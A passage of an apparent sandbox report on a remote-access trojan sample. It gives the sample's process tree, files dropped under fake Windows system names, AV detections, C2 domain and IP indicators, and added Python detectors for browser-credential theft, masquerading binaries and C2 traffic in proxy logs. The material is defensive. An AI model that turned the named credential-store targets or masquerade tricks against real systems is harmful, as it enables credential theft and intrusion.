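    """Collapse the junction cycle so every spelling of a file maps to one real path."""
    path = _LOCAL_SETTINGS.sub(lambda m: m.group("root") + r"\AppData\Local", path)
    while True:
        collapsed = _APP_DATA_LOOP.sub("", path)
        if collapsed == path:
            return path
        path = collapsed


def classify(path: str):
    """Name the kind of browser secret a path points at, or None if it is not one."""
    if not any(d in path for d in BROWSER_DIRS):
        return None
    name = path.rsplit("\\", 1)[-1].removesuffix("-journal")  # SQLite rollback journal
    if name.startswith("Login Data"):      # also "Login Data For Account"
        return "saved passwords"
    if name.endswith("Cookies"):           # "Cookies" and "Extension Cookies"
        return "session cookies"
    if name == "Local State":
        return "master key (DPAPI-wrapped)"
    return None


def flag_non_browser_secret_access(lines):
    """Map each non-browser process image to the distinct browser secrets it opened."""
    hits = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        image = m.group("image")
        if image.rsplit("\\", 1)[-1].lower() in BROWSER_IMAGES:
            continue                       # the browser itself reading its own stores
        path = canonicalize(m.group("path"))
        kind = classify(path)
        if kind is None:
            continue
        browser = "Chrome" if "\\Google\\Chrome\\" in path else "Edge"
        hits.setdefault(image, set()).add((browser, kind, path))
    return hits


if __name__ == "__main__":
    for image, secrets in flag_non_browser_secret_access(SAMPLE_LINES).items():
        print(image)
        for browser, kind, path in sorted(secrets):
            print(f"    {browser:6} {kind:28} {path}")
```

Run against the full access list, the fifty lines above collapse to a short set of distinct targets opened by a single image, C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, which is what a detection rule should key on: a process that is neither chrome.exe nor msedge.exe touching Login Data, Cookies and Local State together.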

                                    Remote Access Functionality

                                    Source: Yara matchFile source: 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: msinto.exe PID: 6248, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 1924, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: hPeZTHbzcsUskSflSyozwAqUA.exe PID: 3352, type: MEMORYSTR
                                    Source: Yara matchFile source: Zn0uX5K1ez.exe, type: SAMPLE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.msinto.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b124a5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4625570.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000002.00000003.2103951252.0000000006000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.2096226398.0000000000B12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000A.00000000.2352080688.0000000000A02000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2119459063.0000000004625000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockhostnet\msinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\debug\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: Zn0uX5K1ez.exe, type: SAMPLE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.msinto.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b124a5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4625570.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockhostnet\msinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\debug\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, type: DROPPED
MITRE ATT&CK matrix, listed per tactic. A number before a technique is the signature-count badge shown in that matrix cell; techniques without a number were not triggered by this analysis.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: 11 Scripting, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: 1 Native API, 2 Command and Scripting Interpreter, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: 11 Scripting, 1 DLL Side-Loading, 31 Registry Run Keys / Startup Folder, Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: 1 Abuse Elevation Control Mechanism, 1 DLL Side-Loading, 12 Process Injection, 31 Registry Run Keys / Startup Folder, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: 1 Disable or Modify Tools, 1 Deobfuscate/Decode Files or Information, 1 Abuse Elevation Control Mechanism, 3 Obfuscated Files or Information, 3 Software Packing, 1 DLL Side-Loading, 1 File Deletion, 232 Masquerading, 341 Virtualization/Sandbox Evasion, 12 Process Injection
Credential Access: 1 OS Credential Dumping, 1 Credential API Hooking, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: 1 System Time Discovery, 3 File and Directory Discovery, 237 System Information Discovery, 631 Security Software Discovery, 2 Process Discovery, 341 Virtualization/Sandbox Evasion, 1 Application Window Discovery, System Owner/User Discovery, Network Sniffing, Network Service Discovery
Lateral Movement: 1 Taint Shared Content, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: 1 Archive Collected Data, 1 Data from Local System, 1 Credential API Hooking, 1 Clipboard Data, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: 1 Encrypted Channel, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
Behavior Graph ID: 1523119 | Sample: Zn0uX5K1ez.exe | Startdate: 01/10/2024 | Architecture: WINDOWS | Score: 100

Signatures on the root node: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 18 other signatures
DNS/IP on the root node: 664930cm.n9shka.top

Process tree recovered from the graph's "started" edges (graph node ids in brackets; numbers in parentheses after a process are its created-registry-value / created-file badges; truncated paths are as shown in the graph):

[2] Start
  [12] Zn0uX5K1ez.exe (4)
      dropped: C:\Users\user\AppData\Local\...\svchost.exe (PE32); C:\Users\user\AppData\Local\...\explorer.exe (PE32+); C:\Users\user\AppData\...\Zn0uX5K1ez.exe.log (ASCII)
      signature: Drops PE files with benign system names
      [22] svchost.exe (3 6)
          dropped: C:\blockhostnet\msinto.exe (PE32); C:\...\dbHnJe8FTGPofdGpjq0jOMhg.vbe (data)
          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
          [28] wscript.exe (1)
              signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
              [35] cmd.exe (1)
                  [37] msinto.exe (15 33)
                      dropped: C:\Windows\debug\explorer.exe (PE32); C:\Windows\...\hPeZTHbzcsUskSflSyozwAqUA.exe (PE32); C:\Windows\...\backgroundTaskHost.exe (PE32); 8 other malicious files
                      signatures: Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; Creates multiple autostart registry keys; 2 other signatures
                      [43] cmd.exe
                          [51] conhost.exe
                              network: 664930cm.n9shka.top (37.44.238.250, ports 49706, 49707, 49708; HARMONYHOSTING-ASFR, France)
                              dropped: C:\Users\user\Desktop\mFVAeiee.log (PE32); C:\Users\user\Desktop\kRRssUig.log (PE32); C:\Users\user\Desktop\iGvrsCDf.log (PE32); C:\Users\user\Desktop\admBIJoy.log (PE32)
                              signature: Tries to harvest and steal browser information (history, passwords, etc)
                          [56] conhost.exe
                          [58] chcp.com
                          [60] w32tm.exe
                      [45] csc.exe (4)
                          dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
                          signature: Infects executable files (exe, dll, sys, html)
                          [62] conhost.exe
                          [64] cvtres.exe
                      [49] csc.exe (4)
                          dropped: C:\Program Files (x86)\...\msedge.exe (PE32)
                          [66] conhost.exe
                          [68] cvtres.exe (1)
                  [41] conhost.exe
      [26] explorer.exe (1)
          signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Query firmware table information (likely to detect VMs); Tries to evade analysis by execution special instruction (VM detection); 3 other signatures
          [31] conhost.exe
          [33] cmd.exe (1)
  [16] hPeZTHbzcsUskSflSyozwAqUA.exe
      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  [18] lsass.exe
  [20] 7 other processes
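Nearly every binary this sample drops carries a real Windows process name (explorer.exe, lsass.exe, svchost.exe, conhost.exe, backgroundTaskHost.exe), which is what the "Files With System Process Name In Unsuspected Locations" and "System File Execution Location Anomaly" Sigma hits in the signature list are keyed on. The added example below (not part of the Joe Sandbox report) applies that check to the drop list above and separates three cases: a known system name outside any directory Windows installs it to, a known name in its expected directory, and a name the allowlist does not know. The middle case is the one a path-only rule misses: C:\Windows\System32\SecurityHealthSystray.exe and C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe appear in the drop list in their legitimate locations, which together with the "Infects executable files" signature means the genuine binaries were overwritten, so those need a hash or Authenticode check rather than a path check. The expected-directory table assumes a stock Windows install and deliberately excludes WinSxS.

```python
from pathlib import PureWindowsPath

# Default install locations of the system binaries whose names this sample reuses
# (assumption: a stock Windows 10/11 install; WinSxS and servicing copies are left
# out on purpose so that they surface for review rather than being trusted).
EXPECTED_DIRS = {
    "explorer.exe": {r"C:\Windows"},
    "lsass.exe": {r"C:\Windows\System32"},
    "svchost.exe": {r"C:\Windows\System32", r"C:\Windows\SysWOW64"},
    "conhost.exe": {r"C:\Windows\System32"},
    "backgroundtaskhost.exe": {r"C:\Windows\System32"},
    "securityhealthsystray.exe": {r"C:\Windows\System32"},
    "msedge.exe": {
        r"C:\Program Files (x86)\Microsoft\Edge\Application",
        r"C:\Program Files\Microsoft\Edge\Application",
    },
}

# Paths dropped by this sample, taken from the report's drop list.
DROPPED = [
    r"C:\Windows\debug\explorer.exe",
    r"C:\Recovery\lsass.exe",
    r"C:\Users\user\AppData\Local\Temp\svchost.exe",
    r"C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe",
    r"C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe",
    r"C:\Windows\System32\SecurityHealthSystray.exe",
    r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
    r"C:\blockhostnet\msinto.exe",
]


def classify_path(path: str) -> str:
    """Classify one file path by its name and directory.

    'masquerade'         system binary name outside every directory Windows installs it to
    'expected-location'  name and directory match; a *dropped* file here means the real
                         binary was overwritten, so its hash/signature must be verified
    'unknown-name'       not a known system binary name; judge it on other evidence
    """
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name not in EXPECTED_DIRS:
        return "unknown-name"
    parent = str(p.parent).lower()            # Windows paths compare case-insensitively
    if parent in {d.lower() for d in EXPECTED_DIRS[name]}:
        return "expected-location"
    return "masquerade"


def triage(dropped):
    """Group dropped paths by verdict, preserving the input order inside each bucket."""
    buckets = {"masquerade": [], "expected-location": [], "unknown-name": []}
    for path in dropped:
        buckets[classify_path(path)].append(path)
    return buckets


if __name__ == "__main__":
    for verdict, paths in triage(DROPPED).items():
        print(verdict)
        for path in paths:
            print("   ", path)
```

On this sample five of the eight drops land in the masquerade bucket and two in expected-location; only msinto.exe is unknown, and it is the one the report identifies as the main stage by its Yara and AV hits rather than by its name.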

Source | Detection | Scanner | Label | Link
Zn0uX5K1ez.exe | 71% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRat |
Zn0uX5K1ez.exe | 74% | Virustotal | | Browse
Zn0uX5K1ez.exe | 100% | Avira | VBS/Runner.VPG |
Zn0uX5K1ez.exe | 100% | Avira | VBS/Runner.VPG |
Zn0uX5K1ez.exe | 100% | Avira | HEUR/AGEN.1323342 |
Zn0uX5K1ez.exe | 100% | Joe Sandbox ML | |
Dropped files

Source | Detection | Scanner | Label
C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Windows\debug\explorer.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Recovery\lsass.exe | 100% | Avira | HEUR/AGEN.1323342
C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\Desktop\SIVCnSke.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\Desktop\crpSXvpM.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\iGvrsCDf.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\Desktop\kRRssUig.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat | 100% | Avira | BAT/Delbat.C
C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\explorer.exe | 100% | Joe Sandbox ML |
C:\Windows\debug\explorer.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\admBIJoy.log | 100% | Joe Sandbox ML |
C:\Recovery\lsass.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\JfNMDZUx.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\crpSXvpM.log | 100% | Joe Sandbox ML |
C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\kRRssUig.log | 100% | Joe Sandbox ML |
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | 56% | Virustotal |
C:\Recovery\lsass.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\lsass.exe | 56% | Virustotal |
C:\Users\user\AppData\Local\Temp\explorer.exe | 71% | ReversingLabs | Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\explorer.exe | 65% | Virustotal |
C:\Users\user\AppData\Local\Temp\svchost.exe | 75% | ReversingLabs | Win32.Trojan.Uztuby
C:\Users\user\AppData\Local\Temp\svchost.exe | 59% | Virustotal |
C:\Users\user\Desktop\AEdPygqV.log | 29% | ReversingLabs |
C:\Users\user\Desktop\AEdPygqV.log | 29% | Virustotal |
C:\Users\user\Desktop\JfNMDZUx.log | 8% | ReversingLabs |
C:\Users\user\Desktop\JfNMDZUx.log | 11% | Virustotal |
C:\Users\user\Desktop\SIVCnSke.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\SIVCnSke.log | 41% | Virustotal |
C:\Users\user\Desktop\admBIJoy.log | 8% | ReversingLabs |
C:\Users\user\Desktop\admBIJoy.log | 11% | Virustotal |
C:\Users\user\Desktop\crpSXvpM.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\crpSXvpM.log | 69% | Virustotal |
C:\Users\user\Desktop\iGvrsCDf.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\iGvrsCDf.log | 41% | Virustotal |
C:\Users\user\Desktop\kRRssUig.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\kRRssUig.log | 69% | Virustotal |
C:\Users\user\Desktop\mFVAeiee.log | 29% | ReversingLabs |
C:\Users\user\Desktop\mFVAeiee.log | 29% | Virustotal |
C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe | 56% | Virustotal |
C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | 56% | Virustotal |
C:\Windows\debug\explorer.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\debug\explorer.exe | 56% | Virustotal |
C:\blockhostnet\msinto.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\blockhostnet\msinto.exe | 56% | Virustotal |
Unpacked PE files

No Antivirus matches
Domains

Source | Detection | Scanner | Label
664930cm.n9shka.top | 9% | Virustotal |
URLs

Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://664930cm.n9shka.top | 9% | Virustotal |
http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php | 9% | Virustotal |
http://664930cm.n9shka.top/ | 9% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
664930cm.n9shka.top | 37.44.238.250 | true | true | | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php | true | | unknown
URLs from memory and binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | conhost.exe memory set A | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | conhost.exe memory set A | false | URL Reputation: safe | unknown
http://664930cm.n9shka.top | conhost.exe, 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002707000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002730000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://duckduckgo.com/ac/?q= | conhost.exe memory set A | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | conhost.exe memory set A | false | | unknown
http://664930cm.n9shka.top/ | conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | conhost.exe memory set A | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | conhost.exe memory set A | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | conhost.exe memory set A | false | URL Reputation: safe | unknown
http://664930cm.n9P | conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | conhost.exe memory set A | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp, msinto.exe, 0000000A.00000002.2389367064.0000000003149000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | conhost.exe memory set A | false | URL Reputation: safe | unknown

Memory set A: the report lists the same 21 conhost.exe dump regions as the source of every browser URL above, each of the form conhost.exe, 00000015.00000002.3417373379.<region>.00000004.00000800.00020000.00000000.sdmp with <region> one of 0000000012D30000, 000000001332F000, 00000000138E7000, 0000000012961000, 0000000012B49000, 0000000012C98000, 0000000012F81000, 0000000013028000, 0000000013CB6000, 000000001397F000, 0000000013147000, 0000000012AB0000, 0000000013D4F000, 0000000013797000, 0000000013517000, 00000000135AF000, 00000000131E0000, 00000000136FF000, 00000000133C7000, 0000000013B67000, 00000000128C8000. The browser search-engine URLs are the default Chromium search-provider strings that the conhost.exe payload has in memory while reading browser data; the fused entries (favicon URL run together with the search URL) are printed as extracted.
Contacted public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
37.44.238.250 | 664930cm.n9shka.top | France | 49434 | HARMONYHOSTING-ASFR | true
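The network tables above give three indicators that stay useful after the sample itself is gone: the domain 664930cm.n9shka.top, the address 37.44.238.250 and the request path /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php. The Python below is an added example, not Joe Sandbox output, showing how to run those indicators over proxy logs. The log format and every log line are constructed (the three client ports 49706 to 49708 mirror the three connections in the behavior graph, which is an assumption about what those numbers are), and the Google favicon URL from the report is included as a line that must not match.

```python
from urllib.parse import urlsplit

# Network IOCs taken from this report.
IOC_DOMAINS = {"664930cm.n9shka.top"}
IOC_IPS = {"37.44.238.250"}
IOC_PATHS = {"/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php"}

# Constructed proxy log (not from the sandbox). Field order, assumed:
# <timestamp> <src_ip>:<src_port> <dst_ip>:<dst_port> <method> <url> <status>
SAMPLE_LOG = """\
2024-10-01T03:57:01Z 10.0.0.15:49706 37.44.238.250:80 POST http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php 200
2024-10-01T03:57:04Z 10.0.0.15:49707 37.44.238.250:80 POST http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php 200
2024-10-01T03:57:09Z 10.0.0.15:49708 37.44.238.250:80 POST http://37.44.238.250/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php 200
2024-10-01T03:58:00Z 10.0.0.15:49710 142.250.74.68:443 GET https://www.google.com/images/branding/product/ico/googleg_lodp.ico 200
2024-10-01T03:58:30Z 10.0.0.22:51000 37.44.238.250:443 CONNECT 37.44.238.250:443 200
2024-10-01T03:59:00Z 10.0.0.31:51122 93.184.216.34:80 GET http://example.com/uploads.php 404
"""


def parse_line(line):
    """Split one log line into a dict; the URL host is normalised via urlsplit."""
    ts, src, dst, method, url, status = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    # CONNECT lines carry host:port only, so give urlsplit a scheme-relative form.
    parts = urlsplit(url if "://" in url else "//" + url)
    return {"ts": ts, "src_ip": src_ip, "src_port": int(src_port),
            "dst_ip": dst_ip, "dst_port": int(dst_port), "method": method,
            "host": parts.hostname or "", "path": parts.path, "status": int(status)}


def match_iocs(event):
    """Return the IOC types an event matches; an empty list means clean."""
    reasons = []
    if event["host"] in IOC_DOMAINS:
        reasons.append("c2 domain " + event["host"])
    # Direct-to-IP beacons (no Host header, or a CONNECT tunnel) still match.
    if event["dst_ip"] in IOC_IPS or event["host"] in IOC_IPS:
        reasons.append("c2 ip " + event["dst_ip"])
    if event["path"] in IOC_PATHS:
        reasons.append("c2 uri path")
    return reasons


def scan(log_text):
    """Return (src_ip, src_port, dst_ip, method, reasons) for every matching line."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        reasons = match_iocs(ev)
        if reasons:
            hits.append((ev["src_ip"], ev["src_port"], ev["dst_ip"], ev["method"], reasons))
    return hits


def hosts_to_triage(hits):
    """Group matched IOC types per internal host: the list an IR ticket needs."""
    out = {}
    for src_ip, _, _, _, reasons in hits:
        out.setdefault(src_ip, set()).update(reasons)
    return out


if __name__ == "__main__":
    for host, reasons in sorted(hosts_to_triage(scan(SAMPLE_LOG)).items()):
        print(host, sorted(reasons))
```

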